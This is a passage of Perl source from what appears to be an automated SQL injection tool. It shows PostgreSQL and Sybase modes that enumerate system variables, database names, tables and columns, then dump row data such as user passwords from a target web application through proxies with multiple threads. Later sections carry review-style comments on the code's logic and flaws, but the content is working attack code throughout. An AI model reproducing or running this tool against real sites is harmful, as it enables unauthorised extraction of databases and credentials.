  6296.     print "-----------------------------------------\n";
  6297.     print "Enter the table_name: ";
  6298.     $choice = <STDIN>;
  6299.     chomp $choice;
  6300.     print "Table: $choice\n";
  6301.     print "----------\n";
  6302.     print FILE  "-----------------------------------------\n";
  6303.     print FILE  "Table [ $choice ]\n";
  6304.     print FILE  "-----------------------------------------\n";
  6305.     $table_name1 = $choice;
  6306.     $table_name = char_p ($choice);
  6307.     $current = $p_subquery_url . "cast((select" . $p_plus . $p_sql_pref1 . "count(*)" . $p_sql_pref2 . $p_plus . "from" . $p_plus . "information_schema.columns" . $p_plus . "where" . $p_plus . "table_name=" . $table_name . ")"  . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_filtr;
  6308.     $content = scan_url();
  6309.     $content =~ m/ussr(.*?)ussr/imgs;
  6310.     $colum_number = $1; # ???-?? ??????? ? ??????????? ?????
  6311.     print "Number of columns in " . $table_name1 . ": $colum_number\n";
  6312.     print FILE  "Number of columns in " . $table_name1 . ": $colum_number\n";
  6313.     print "----------\n";
  6314.     ## ?????? ??????? ##
  6315.     $thr = $kol_threads; # ???-?? ???????
  6316.     $num = -1; # ?? ????????
  6317.     print "Request method - $method\n";
  6318.     print "Threads - $kol_threads\n";
  6319.     print "Proxy - $proxy_message\n";
  6320.     print "----------------------\n";
  6321.     $url15 = $p_subquery_url . "cast((select" . $p_plus . $p_sql_pref1 . "column_name" . $p_sql_pref2 . $p_plus . "from" . $p_plus . "information_schema.columns" . $p_plus . "where" . $p_plus . "table_name=" . $table_name . $p_plus . "limit" . $p_plus . "1";
  6322.     print FILE  "Columns in " . $table_name1 . "\n";
  6323.     for(0..$thr) {
  6324.          $trl[$_] = threads->create(\&gets815);
  6325.     }
  6326.     for(0..$thr) {
  6327.          $trl[$_]->join;
  6328.     }
  6329.     sub gets815 {
  6330.        $| = 1;
  6331.        while ($num<$colum_number) {
  6332.          { lock($num);
  6333.          $num++; }
  6334.          $current = $url15 . $p_plus . "offset" . $p_plus . $num . ")" . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_filtr;
  6335.          $content = scan_url();
  6336.          if ($content =~ m/ussr(.*?)ussr/imgs) {
  6337.                   print "   " . $1 . "\n";
  6338.                   print FILE "  "  . $1 . "\n";
  6339.          }
  6340.          print $num . "\r";
  6341.          sleep $pause;
  6342.  
  6343.        }
  6344.     }
  6345.     print FILE "----------\n";
  6346.     print "----------\n";
  6347.     print "Saved in " . "z_" . $host . ".txt\n";
  6348.     close(FILE);
  6349.     goto START_ps;
  6350. }
  6351. if ($choice == 4) {
  6352.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  6353.     print "-----------------------------------------\n";
  6354.     print "Enter the table_name: ";
  6355.     $choice = <STDIN>;
  6356.     chomp $choice;
  6357.     $table_name = $choice;
  6358.     print "Table: $table_name\n";
  6359.     print "-----------------------------------------\n";
  6360.     print "Enter the column(s) name(s) - for example - id or id,username,user_password:\n";
  6361.     $choice = <STDIN>;
  6362.     chomp $choice;
  6363.     $column_name1 = $choice;
  6364.     $column_name = $choice;
  6365.     @column_spis = split(/,/,$column_name);
  6366.     $size = @column_spis;
  6367.     if ($size > 1) {
  6368.        $column_name = "";
  6369.        $a = 0;
  6370.        while ($a < $size) {
  6371.         if ($a == ($size-1)) {
  6372.           $column_name .= $column_spis[$a];
  6373.         } else {
  6374.           $column_name .= $column_spis[$a] . "||chr(58)||";
  6375.         }
  6376.           $a++;
  6377.        }
  6378.     }
  6379.     print FILE  "-----------------------------------------\n";
  6380.     print FILE  "Dump column(s): [ " . $column_name1 . " ] from [ " .$table_name . " ]\n";
  6381.     print FILE  "-----------------------------------------\n";
  6382.     print "Dump column(s): [ " . $column_name1. " ] from [ " .$table_name . " ]\n";
  6383.     print "-----------------------------------------\n";
  6384.     ## ?????? ???-?? ???????? ?? ??????? #
  6385.     print "Count data from [ $table_name  ]\n";
  6386.     $current = $p_subquery_url . "cast((select" . $p_plus . $p_sql_pref1 . "count(*)" . $p_sql_pref2 . $p_plus . "from" . $p_plus . $table_name . ")"  . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_filtr;
  6387.     $content = scan_url();
  6388.     $column_name_p = $content;
  6389.     $column_name_p =~ m/ussr(.*?)ussr/imgs;
  6390.     $column_name_p = $1; # ???-?? ???????? ? ??????? ?? ????????? ???????
  6391.     print "$column_name_p\n";
  6392.     print "----------\n";
  6393.     print "Get ALL data from " . $table_name . " (" . $column_name_p . ") ? (1/0): ";
  6394.     $choice = <STDIN>;
  6395.     chomp $choice;
  6396.     $thr = $kol_threads; # ???-?? ???????
  6397.     if ($choice == 1) {
  6398.          $num = -1; # ?? ????????
  6399.     } else {
  6400.          print "Enter START_position: ";
  6401.          $choice1 = <STDIN>;
  6402.          chomp $choice1;
  6403.          $num = $choice1-2;
  6404.          print "Enter END_position: ";
  6405.          $choice2 = <STDIN>;
  6406.          chomp $choice2;
  6407.          $column_name_p = $choice2-1;
  6408.          print "Dump records from [" . ($num+2) . "] to [" . ($column_name_p+1) . "]\n";
  6409.     }
  6410.     print "-----------------------------------------\n";
  6411.     print "Request method - $method\n";
  6412.     print "Threads - $kol_threads\n";
  6413.     print "Proxy - $proxy_message\n";
  6414.     print "----------------------\n";
  6415.     ## ?????? ?????? ?? ??????? ##
  6416.     $url17 = $p_subquery_url . "cast((select" . $p_plus . $p_sql_pref1 . $column_name . $p_sql_pref2 . $p_plus . "from" . $p_plus . $table_name . $p_plus . "limit" . $p_plus . "1";
  6417.     for(0..$thr) {
  6418.         $trl[$_] = threads->create(\&gets816);
  6419.     }
  6420.     for(0..$thr) {
  6421.         $trl[$_]->join;
  6422.     }
  6423.     sub gets816 {
  6424.             $| = 1;
  6425.             while ($num<$column_name_p) {
  6426.                { lock($num);
  6427.                $num++; }
  6428.                $current = $url17 . $p_plus . "offset" . $p_plus . $num . ")" . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_filtr;
  6429.                $content = scan_url();
  6430.                if ($content =~ m/ussr(.*?)ussr/img) {
  6431.                     print "   " . $1 . "\n";
  6432.                     print FILE "  "  . $1 . "\n";
  6433.                }
  6434.                print $num . "\r";
  6435.                sleep $pause;
  6436.  
  6437.             }
  6438.     }
  6439.     print "----------\n";
  6440.     print "Saved in " . "z_" . $host . ".txt\n";
  6441.     close(FILE);
  6442.     goto START_ps;
  6443. }
  6444. }
  6445.  #end PosgreSQL
  6446. if ($choice == 5) {goto START_global}
  6447. }
  6448. ######################################################################################################################
  6449. ##Sybase SQL ##############
  6450. if ($choice == 4) {
  6451. START_sb:
  6452. if ($s_union_select_url =~ m/^https:\/\/?([^\/]+)/i) {
  6453.    $host9 = $1;
  6454.    $https_flag = 1;
  6455.    print "----------------------\n";
  6456.    print "HTTPS mode enabled\n";
  6457.    print "----------------------\n";
  6458. }
  6459. if ($s_subquery_url =~ m/^https:\/\/?([^\/]+)/i) {
  6460.    $host9 = $1;
  6461.    $https_flag = 1;
  6462.    print "----------------------\n";
  6463.    print "HTTPS mode enabled\n";
  6464.    print "----------------------\n";
  6465. }
  6466.  
  6467. $host = $host9;
  6468. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
  6469.     print "-----------------------------------------\n";
  6470.     print "Authorization required, wait please....";
  6471.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
  6472.     $ck1 = collect($answ1);
  6473.     $https_auth_check = 1;
  6474.     print " DONE\n";
  6475.     print "-----------------------------------------\n";
  6476. }
  6477. if ($use_socks == 1 && $socks_check == 0) {
  6478.   $check_url = $host;
  6479.   our $query = "GET / HTTP/1.$http_protocol\r\n"
  6480.            . "Host: $check_host\r\n"
  6481.            . "Referer: http://" . $check_url . "\r\n"
  6482.            . "Accept: */*\r\n"
  6483.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
  6484.            . "Connection: close\r\n\r\n";
  6485.    print "----------------------------------------\n";
  6486.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
  6487.    print "Timeout = 5 sec:\n";
  6488.    print "----------------------------------------\n";
  6489.    $socks_check = 0;
  6490.    $check_socks = socks_check();
  6491.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
  6492.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
  6493.   if ($current_proxy_host) {
  6494.      $socks_check = 1;
  6495.      print "Will use --> $proxy_message\n";
  6496.   } else {
  6497.      $socks_check = 0;
  6498.      $proxy_message = "No";
  6499.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
  6500.   }
  6501. }
  6502. sub ascii_to_hex ($) {
  6503.                (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
  6504.                $str = "0x" . $str;
  6505.              return $str;
  6506. }
  6507. print "----------------------------------------------------------\n";
  6508. print "               Choose mode:\n";
  6509. print "----------------------------------------------------------\n";
  6510. print "    [1] Sybase SQL inj system information\n";
  6511. print "    [2] Sybase SQL inj get DB names from master..syslogins \n";
  6512. print "    [3] Sybase SQL inj get tables from DB\n";
  6513. print "    [4] Sybase SQL inj get column_name from table\n";
  6514. print "    [5] Sybase SQL inj get data from columns\n";
  6515. print "    =======================================================\n";
  6516. print "    [6] Main menu\n";
  6517. print "----------------------------------------------------------\n";
  6518. $choice = <STDIN>;
  6519. chomp $choice;
  6520. print "Your choice: $choice\n";
  6521. if ($choice == 1) {
  6522.      open( FILE, ">>" . "z_" . $host . ".txt" ); # ???? ??? ?????? ???????????
  6523.      if ($s_method == 1) {
  6524.          $url1 = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  '@@version' . $s_sql_pref2 . '))' . $s_filtr;
  6525.          $url2 = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  'user_name()' . $s_sql_pref2 . '))' . $s_filtr;
  6526.          $url3 = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  '@@boottime' . $s_sql_pref2 . '))' . $s_filtr;
  6527.          $url4 = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  '@@errorlog' . $s_sql_pref2 . '))' . $s_filtr;
  6528.  
  6529.          $url5 = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  '@@language' . $s_sql_pref2 . '))' . $s_filtr;
  6530.          $url6 = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  '@@servername' . $s_sql_pref2 . '))' . $s_filtr;
  6531.          $url7 = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  'db_name()' . $s_sql_pref2 . '))' . $s_filtr;
  6532.          @array = ($url1,$url2,$url3,$url4,$url5,$url6,$url7);
  6533.          $size = @array; #???????? ?????? ???????
  6534.          print "----------------\n";
  6535.          print "SUBQUERY METHOD\n";
  6536.          print "----------------\n";
  6537.      }
  6538.      if ($s_method == 0) {
  6539.          $url1 = $ss_sql_start . $s_sql_pref1 .  '@@version' . $s_sql_pref2 . $ss_sql_end . $s_filtr;
  6540.          $url2 = $ss_sql_start . $s_sql_pref1 .  'user_name()' . $s_sql_pref2 . $ss_sql_end . $s_filtr;
  6541.          $url3 = $ss_sql_start . $s_sql_pref1 .  '@@boottime' . $s_sql_pref2 . $ss_sql_end . $s_filtr;
  6542.          $url4 = $ss_sql_start . $s_sql_pref1 .  '@@errorlog' . $s_sql_pref2 . $ss_sql_end . $s_filtr;
  6543.          $url5 = $ss_sql_start . $s_sql_pref1 .  '@@language' . $s_sql_pref2 . $ss_sql_end . $s_filtr;
  6544.          $url6 = $ss_sql_start . $s_sql_pref1 .  '@@servername' . $s_sql_pref2 . $ss_sql_end . $s_filtr;
  6545.          $url7 = $ss_sql_start . $s_sql_pref1 .  'db_name()' . $s_sql_pref2 . $ss_sql_end . $s_filtr;
  6546.          @array = ($url1,$url2,$url3,$url4,$url5,$url6,$url7);
  6547.          $size = @array; #???????? ?????? ???????
  6548.          print "-------------------\n";
  6549.          print "UNION SELECT METHOD\n";
  6550.          print "-------------------\n";
  6551.      }
  6552.      print "HOST - $host\n";
  6553.      $thr = $kol_threads; # ???-?? ???????
  6554.      $num = -1; # ?? ????????
  6555.      print "-----------------------------------------\n";
  6556.      print "System information:\n";
  6557.      print "-----------------------------------------\n";
  6558.      print FILE  "-----------------------------------------\n";
  6559.      print FILE  "HOST: $host\n";
  6560.      print FILE "-----------------------------------------\n";
  6561.      print FILE "System information:\n";
  6562.      print FILE "-----------------------------------------\n";
  6563.      print "Request method - $method\n";
  6564.      print "Threads - $kol_threads\n";
  6565.      print "Proxy - $proxy_message\n";
  6566.      print "----------------------\n";
  6567.      for(0..$thr) {
  6568.         $trl[$_] = threads->create(\&gets680);
  6569.      }
  6570.      for(0..$thr) {
  6571.         $trl[$_]->join;
  6572.      }
  6573.      sub gets680 {
             # Worker body for the "system information" mode above: each thread
             # claims the next index of @array (one probe URL per variable, built
             # before the threads were spawned), fetches it through scan_url() and
             # prints whatever sits between the two 'ussr' marker strings.
             # Uses only package globals: $num (declared ": shared" at the top of
             # the file), @array, $size, $mess, $current, $content, $pause, FILE.
  6574.         $| = 1;
             # Guard is evaluated BEFORE the increment, so the last thread through
             # can end up with $num == $size and read one past the end of @array.
  6575.         while ($num<$size) {
  6576.             { lock($num);
  6577.             $num++; }
             # $num is re-read here without the lock; another thread may already
             # have advanced it, so $current and $mess can belong to a later index
             # than the one this thread claimed (and a URL can be skipped).
  6578.             $current = $array[$num];
             # Labels follow the order of @array as assembled by the caller.
  6579.             if ($num == 0) {$mess = '@@version: '}
  6580.             if ($num == 1) {$mess = "user_name(): "}
  6581.             if ($num == 2) {$mess = '@@boottime: '}
  6582.             if ($num == 3) {$mess = '@@errorlog: '}
  6583.             if ($num == 4) {$mess = '@@language: '}
  6584.             if ($num == 5) {$mess = '@@servername: '}
  6585.             if ($num == 6) {$mess = 'db_name(): '}
             # scan_url() is defined elsewhere in the file; it reads $current.
  6586.             $content = scan_url();
             # The fixed 'ussr' delimiters are what the tool looks for in the
             # response; that literal is a simple server-side detection signature.
  6587.             if ($content =~ m/ussr(.*?)ussr/imgs) {
  6588.                   print $mess . $1 . "\n";
             # FILE is a bareword handle shared by all worker threads; writes are
             # not serialised, so lines from different threads may interleave.
  6589.                   print FILE $mess . $1 . "\n";
  6590.             }
  6591.             print $num . "\r";
             # $pause (seconds between requests) is set outside this view.
  6592.             sleep $pause;
  6593.         }
  6594.      }
  6595.      print "----------\n";
  6596.      print "Saved in " . "z_" . $host . ".txt\n";
  6597.      close(FILE);
  6598.      goto START_sb;
  6599. }
  6600. if ($choice == 2) {
       # Sybase mode 2: enumerate database names from master..syslogins, one
       # request per name. Single-threaded. Each round asks for max(dbname)
       # excluding every name already seen (hex-encoded NOT IN list), and stops
       # at the first response that carries no 'ussr...ussr' marker.
       # NOTE(review): 2-arg open with an unchecked return; $host is taken from
       # the target URL and is concatenated straight into the mode/filename
       # string. A 3-arg open with "or die" would remove that ambiguity.
  6601.      open( FILE, ">>" . "z_" .$host . ".txt" ); # append-mode results file
  6602.      print FILE "=============================================" . "\n";
  6603.      print FILE "DB names from master..syslogins:" . "\n";
  6604.      print FILE "=============================================" . "\n";
  6605.      print "-----------------------------------------\n";
  6606.      print "DB names from master..syslogins:\n";
  6607.      print "Request method - $method\n";
  6608.      print "Threads - 1 (Sybase)\n";
  6609.      print "Proxy - $proxy_message\n";
  6610.      print "----------------------\n";
  6611.      $| = 1;
  6612.      $flag = 0;          # set to 1 when a response has no marker -> loop ends
  6613.      $table_name = "";   # comma-separated, hex-encoded names already found
  6614.      $ss = 0;            # request counter (1 on the first round)
       # No iteration cap: the loop runs until a response lacks the marker.
  6615.      while ($flag == 0) {
  6616.               $ss++;
       # $s_method == 1: subquery injection wrapped in convert(); == 0: UNION
       # SELECT. Both variants and all $s_* fragments are configured elsewhere.
  6617.             if ($s_method == 1) {
  6618.               if ($ss== 1) {
  6619.                  $current = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  'max(dbname)' . $s_sql_pref2 .  $s_plus . "from" . $s_plus . "master..syslogins))" . $s_filtr;
  6620.               } else {
  6621.                  $current = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  'max(dbname)' . $s_sql_pref2 .  $s_plus . "from" . $s_plus . "master..syslogins" . $s_plus . "where" . $s_plus . "dbname" . $s_plus . "not" . $s_plus . "in" . $s_plus . "(" . $table_name .  ")))" . $s_filtr;
  6622.               }
  6623.             }
  6624.             if ($s_method == 0) {
  6625.               if ($ss== 1) {
  6626.                  $current = $ss_sql_start . $s_sql_pref1 .  'max(dbname)' . $s_sql_pref2 . $ss_sql_end . $s_plus . "from" . $s_plus . "master..syslogins" . $s_filtr;
  6627.               } else {
  6628.                  $current = $ss_sql_start . $s_sql_pref1 .  'max(dbname)' . $s_sql_pref2 . $ss_sql_end . $s_plus . "from" . $s_plus . "master..syslogins"  . $s_plus . "where" . $s_plus . "dbname" . $s_plus . "not" . $s_plus . "in" . $s_plus . "(" . $table_name .  ")" . $s_filtr;
  6629.               }
  6630.             }
       # scan_url() (defined elsewhere) reads $current and returns the body.
  6631.               $content = scan_url();
  6632.               if ($content =~ m/ussr(.*?)ussr/imgs) {
       # ascii_to_hex() is defined elsewhere; presumably it produces the hex
       # literal used in the NOT IN list so the name needs no quoting.
  6633.                   if ($ss == 1) {
  6634.                        $table_name = ascii_to_hex($1);
  6635.                   }
  6636.                   if ($ss > 1) {
  6637.                        $table_name .= "," . ascii_to_hex($1);
  6638.                   }
  6639.                   print FILE $1 . "\n";
  6640.                   print $1 . "\n";
  6641.               } else {
  6642.                   $flag = 1;
  6643.               }
  6644.               print $ss . "\r";
  6645.               sleep $pause;
  6646.      }
  6647.      print "----------\n";
  6648.      print "Saved in " . "z_" . $host . ".txt\n";
  6649.      close(FILE);
       # START_sb is the Sybase menu label, defined above this view.
  6650.      goto START_sb;
  6651. }
  6652. if ($choice == 3) {
       # Sybase mode 3: list user tables (type=0x55) of one database from
       # <db>..sysobjects. Each response carries "name:id"; the ids seen so far
       # are excluded through a NOT IN list until no marker comes back.
       # NOTE(review): 2-arg open, return value unchecked; see mode 2.
  6653.      open( FILE, ">>" . "z_" .$host . ".txt" ); # append-mode results file
  6654.      print "-----------------------------------------\n";
  6655.      print "Enter DB name for get tables name:\n";
  6656.      print "-----------------------------------------\n";
       # The database name is taken from STDIN verbatim and concatenated into
       # the query below; the caller's menu variable $choice is overwritten.
  6657.      $choice = <STDIN>;
  6658.      chomp $choice;
  6659.      $db_name = $choice;
  6660.      print "DB name: " . $db_name . "\n";
  6661.      print FILE "=============================================" . "\n";
  6662.      print FILE "Tables names from " .  $db_name . "\n";
  6663.      print FILE "=============================================" . "\n";
  6664.      print "-----------------------------------------\n";
  6665.      print "Tables names from " .  $db_name . "\n";
  6666.      print "Request method - $method\n";
  6667.      print "Threads - 1 (Sybase)\n";
  6668.      print "Proxy - $proxy_message\n";
  6669.      print "----------------------\n";
  6670.      $| = 1;
  6671.      $flag = 0;          # 1 once a response has no marker
  6672.      $table_name = "";   # name part of the last "name:id" pair
  6673.      $table_id = "";     # comma-separated ids already seen (NOT IN list)
  6674.      $ss = 0;            # request counter
  6675.      while ($flag == 0) {
  6676.               $ss++;
       # Same two injection shapes as mode 2 ($s_method 1 = subquery/convert,
       # 0 = UNION SELECT); fragments come from configuration outside this view.
  6677.            if ($s_method == 1) {
  6678.               if ($ss== 1) {
  6679.                  $current = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  'max(name||0x3a||convert(char,id))' . $s_sql_pref2 .  $s_plus . "from" . $s_plus . $db_name . "..sysobjects" . $s_plus . "where" . $s_plus . "type=0x55))" . $s_filtr;
  6680.               } else {
  6681.                  $current = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  'max(name||0x3a||convert(char,id))' . $s_sql_pref2 .  $s_plus . "from" . $s_plus . $db_name . "..sysobjects" . $s_plus . "where" . $s_plus . "type=0x55" . $s_plus . "and" . $s_plus . "id" . $s_plus . "not" . $s_plus . "in" . $s_plus . "(" . $table_id .  ")))" . $s_filtr;
  6682.               }
  6683.             }
  6684.             if ($s_method == 0) {
  6685.               if ($ss== 1) {
  6686.                  $current = $ss_sql_start . $s_sql_pref1 .  'max(name||0x3a||convert(char,id))' . $s_sql_pref2 . $ss_sql_end .  $s_plus . "from" . $s_plus . $db_name . "..sysobjects" . $s_plus . "where" . $s_plus . "type=0x55" . $s_filtr;
  6687.               } else {
  6688.                  $current = $ss_sql_start . $s_sql_pref1 .  'max(name||0x3a||convert(char,id))' . $s_sql_pref2 . $ss_sql_end .  $s_plus . "from" . $s_plus . $db_name . "..sysobjects" . $s_plus . "where" . $s_plus . "type=0x55" . $s_plus . "and" . $s_plus . "id" . $s_plus . "not" . $s_plus . "in" . $s_plus . "(" . $table_id .  ")" . $s_filtr;
  6689.               }
  6690.             }
  6691.               $content = scan_url();
  6692.               if ($content =~ m/ussr(.*?)ussr/imgs) {
       # "name:id" split on the first colon; a name containing ':' would be
       # truncated here. $1 is not used again after this split.
  6693.               ($table_name,$table_id1) = split(/:/,$1);
  6694.                   if ($ss == 1) {
  6695.                        $table_id = $table_id1;
  6696.                   }
  6697.                   if ($ss > 1) {
  6698.                        $table_id .= "," . $table_id1;
  6699.                   }
  6700.                   print FILE "DB [" . $db_name . "], table name [" . $table_name . "], id: --> " . $table_id1 . "\n";
  6701.                   print "DB [" . $db_name . "], table name [" . $table_name . "], id: --> " . $table_id1 . "\n";
  6702.               } else {
  6703.                   $flag = 1;
  6704.               }
  6705.               print $ss . "\r";
  6706.               sleep $pause;
  6707.      }
  6708.      print "----------\n";
  6709.      print "Saved in " . "z_" . $host . ".txt\n";
  6710.      close(FILE);
  6711.      goto START_sb;
  6712. }
  6713. if ($choice == 4) {
       # Sybase mode 4: list column names of one table (by numeric table id)
       # from <db>..syscolumns. Mirrors mode 3 but keys on colid instead of id.
       # NOTE(review): 2-arg open, return value unchecked; see mode 2.
  6714.      open( FILE, ">>" . "z_" .$host . ".txt" ); # append-mode results file
  6715.      print "-----------------------------------------\n";
  6716.      print "Enter DB name:\n";
  6717.      print "-----------------------------------------\n";
       # Both prompts reuse $choice; database name and table id are inserted
       # into the query text unmodified (no numeric check on the id).
  6718.      $choice = <STDIN>;
  6719.      chomp $choice;
  6720.      $db_name = $choice;
  6721.      print "DB name: " . $db_name . "\n";
  6722.      print "-----------------------------------------\n";
  6723.      print "Enter table ID for get columns name:\n";
  6724.      print "-----------------------------------------\n";
  6725.      $choice = <STDIN>;
  6726.      chomp $choice;
  6727.      $table_id = $choice;
  6728.      print "Table ID: " . $table_id . "\n";
  6729.      print FILE "=============================================" . "\n";
  6730.      print FILE "Columns names from DB [" . $db_name . "] and table with ID: " .  $table_id . "\n";
  6731.      print FILE "=============================================" . "\n";
  6732.      print "-----------------------------------------\n";
  6733.      print "Columns names from DB [" . $db_name . "] and table with ID: " .  $table_id . "\n";
  6734.      print "Request method - $method\n";
  6735.      print "Threads - 1 (Sybase)\n";
  6736.      print "Proxy - $proxy_message\n";
  6737.      print "----------------------\n";
  6738.      $| = 1;
  6739.      $flag = 0;           # 1 once a response has no marker
  6740.      $column_name = "";   # name part of the last "name:colid" pair
  6741.      $column_id = "";     # comma-separated colids already seen
  6742.      $ss = 0;             # request counter
  6743.      while ($flag == 0) {
  6744.               $ss++;
       # Branch order is swapped relative to modes 2/3 (UNION first); the
       # fragments are the same configuration globals.
  6745.            if ($s_method == 0) {
  6746.               if ($ss== 1) {
  6747.                  $current = $ss_sql_start . $s_sql_pref1 .  'max(name||0x3a||convert(char,colid))' . $s_sql_pref2 . $ss_sql_end . $s_plus . "from" . $s_plus . $db_name . "..syscolumns" . $s_plus . "where" . $s_plus . "id=" . $table_id . $s_filtr;
  6748.               } else {
  6749.                  $current = $ss_sql_start . $s_sql_pref1 .  'max(name||0x3a||convert(char,colid))' . $s_sql_pref2 . $ss_sql_end . $s_plus . "from" . $s_plus . $db_name . "..syscolumns" . $s_plus . "where" . $s_plus . "id=" . $table_id . $s_plus . "and" . $s_plus . "colid" . $s_plus . "not" . $s_plus . "in" . $s_plus . "(" . $column_id .  ")" . $s_filtr;
  6750.               }
  6751.            }
  6752.            if ($s_method == 1) {
  6753.               if ($ss== 1) {
  6754.                  $current = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  'max(name||0x3a||convert(char,colid))' . $s_sql_pref2 .  $s_plus . "from" . $s_plus . $db_name . "..syscolumns" . $s_plus . "where" . $s_plus . "id=" . $table_id .  "))" . $s_filtr;
  6755.               } else {
  6756.                  $current = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  'max(name||0x3a||convert(char,colid))' . $s_sql_pref2 .  $s_plus . "from" . $s_plus . $db_name . "..syscolumns" . $s_plus . "where" . $s_plus . "id=" . $table_id . $s_plus . "and" . $s_plus . "colid" . $s_plus . "not" . $s_plus . "in" . $s_plus . "(" . $column_id .  ")))" . $s_filtr;
  6757.               }
  6758.            }
  6759.               $content = scan_url();
  6760.               if ($content =~ m/ussr(.*?)ussr/imgs) {
       # "name:colid" split on the first colon; $1 is not used after this.
  6761.               ($column_name,$column_id1) = split(/:/,$1);
  6762.                   if ($ss == 1) {
  6763.                        $column_id = $column_id1;
  6764.                   }
  6765.                   if ($ss > 1) {
  6766.                        $column_id .= "," . $column_id1;
  6767.                   }
  6768.                   print FILE "DB [" . $db_name . "], table ID [" . $table_id . "], column_name: --> " . $column_name . "\n";
  6769.                   print "DB [" . $db_name . "], table ID [" . $table_id . "], column_name: --> " . $column_name . "\n";
  6770.               } else {
  6771.                   $flag = 1;
  6772.               }
  6773.               print $ss . "\r";
  6774.               sleep $pause;
  6775.      }
  6776.      print "----------\n";
  6777.      print "Saved in " . "z_" . $host . ".txt\n";
  6778.      close(FILE);
  6779.      goto START_sb;
  6780. }
  6781. if ($choice == 5) {
       # Sybase mode 5: read rows of chosen column(s) from one table, one row
       # per request, walking max(...) downwards with a growing NOT IN list
       # keyed on the first column ($f_column). Single-threaded.
       # NOTE(review): 2-arg open, return value unchecked; see mode 2.
  6782.      open( FILE, ">>" . "z_" .$host . ".txt" ); # append-mode results file
  6783.      print "-----------------------------------------\n";
  6784.      print "Enter DB name:\n";
  6785.      print "-----------------------------------------\n";
  6786.      $choice = <STDIN>;
  6787.      chomp $choice;
  6788.      $db_name = $choice;
  6789.      print "DB name: " . $db_name . "\n";
  6790.      print "-----------------------------------------\n";
  6791.      print "Enter Table name:\n";
  6792.      print "-----------------------------------------\n";
  6793.      $choice1 = <STDIN>;
  6794.      chomp $choice1;
  6795.      $table_name = $choice1;
  6796.      print "Table name: " . $table_name . "\n";
  6797.      print "----------------------------------------------------------------------------\n";
  6798.      print "Enter the column(s) name(s) - for example - id or id,username,user_password:\n";
  6799.      print "----------------------------------------------------------------------------\n";
  6800.      $choice2 = <STDIN>;
  6801.      chomp $choice2;
  6802.      $column_name1 = $choice2;   # original user text, kept for the report header
  6803.      $column_name = $choice2;    # becomes the select expression
  6804.      $f_column = $column_name1;  # column used in the NOT IN exclusion
  6805.      @column_spis = split(/,/,$column_name);
  6806.      $size = @column_spis;       # number of requested columns
       # Several columns: concatenate them as convert(varchar,c1)||0x3a||...
       # so one value per row comes back; the first column drives exclusion.
  6807.      if ($size > 1) {
  6808.        $column_name = "";
  6809.        $f_column = $column_spis[0];
       # $a is Perl's sort() package variable; used here as a plain counter.
  6810.        $a = 0;
  6811.        while ($a < $size) {
  6812.         if ($a == ($size-1)) {
  6813.           $column_name .= "convert(varchar," . $column_spis[$a] . ")";
  6814.         } else {
  6815.           $column_name .= "convert(varchar," . $column_spis[$a] . ")||0x3a||";
  6816.         }
  6817.           $a++;
  6818.        }
  6819.      }
  6820.      print FILE  "-----------------------------------------\n";
  6821.      print FILE  "Dump column(s): [ " . $column_name1 . " ] from [ " . $db_name . ".." . $table_name . " ]\n";
  6822.      print FILE  "-----------------------------------------\n";
  6823.      print "----------------------------------------------------------------------------\n";
  6824.      print "Dump column(s): [ " . $column_name1. " ] from [ " . $db_name . ".." . $table_name . " ]\n";
  6825.      print "Request method - $method\n";
  6826.      print "Threads - 1 (Sybase)\n";
  6827.      print "Proxy - $proxy_message\n";
  6828.      print "----------------------\n";
  6829.             $| = 1;
  6830.             $current_name = "";   # NOT IN list of first-column values seen so far
  6831.             $s = 0;               # rows fetched so far
  6832.             $flag = 0;            # 1 once a response has no marker
  6833.             $temp = "";
  6834.             $temp1 = "";
  6835.             $temp2 = "";
  6836.             while ($flag == 0) {
       # $i is assigned from the shared $num but never read in this loop.
  6837.                $i = $num;
  6838.              if ($s_method == 1) {
  6839.                if ($s == 0) {
  6840.                     $current = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  'max(' . $column_name . ')' . $s_sql_pref2 .  $s_plus . "from" . $s_plus . $db_name . ".." . $table_name .  "))" . $s_filtr;
  6841.                } else {
  6842.                     $current = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  'max(' . $column_name . ')' . $s_sql_pref2 .  $s_plus . "from" . $s_plus . $db_name . ".." . $table_name . $s_plus . "where" . $s_plus . "convert(varchar," . $f_column . ")" . $s_plus . "not" . $s_plus . "in" . $s_plus . "(" . $current_name . ")))" . $s_filtr;
  6843.                }
